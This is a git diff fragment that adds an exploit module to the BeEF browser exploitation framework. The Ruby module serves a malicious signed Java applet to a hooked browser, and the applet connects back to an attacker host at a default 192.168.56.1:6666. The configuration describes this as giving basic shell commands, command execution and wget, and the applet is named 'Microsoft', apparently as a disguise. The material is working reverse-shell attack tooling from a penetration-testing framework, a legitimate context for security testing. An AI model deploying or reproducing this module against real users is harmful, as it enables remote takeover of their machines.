+            description: "Inject a malicious signed Java Applet (JavaPayload) that connects back to the attacker giving basic shell commands, command exec and wget.<br/>Before launching it, be sure to have the JavaPayload StagerHandler listening<br/>, i.e.: java javapayload.handler.stager.StagerHandler <payload> <IP> <PORT> -- JSh"
+            authors: ["antisnatchor"]
+            target:
+                not_working: ["FF"]
+                user_notify: ["All"]
\ No newline at end of file
diff --git a/modules/exploits/java_payload/module.rb b/modules/exploits/java_payload/module.rb
new file mode 100755
index 000000000..e21d6aaef
--- /dev/null
+++ b/modules/exploits/java_payload/module.rb
@@ -0,0 +1,37 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Java_payload < BeEF::Core::Command
+
+  def pre_send
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/java_payload/AppletReverseTCP-0.2.jar', '/anti', 'jar')
+  end
+
+
+  def self.options
+    return [
+        {'name' => 'conn', 'ui_label' => 'Payload', 'value' => 'ReverseTCP'},
+        {'name' => 'cbHost', 'ui_label' => 'Connect Back to Host', 'value' => '192.168.56.1'},
+        {'name' => 'cbPort', 'ui_label' => 'Connect Back to Port', 'value' => '6666'},
+        {'name' => 'applet_id', 'ui_label' => 'Applet id', 'value' => rand(32**20).to_s(32)},
+        {'name' => 'applet_name', 'ui_label' => 'Applet name', 'value' => 'Microsoft'}
+    ]
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+
+end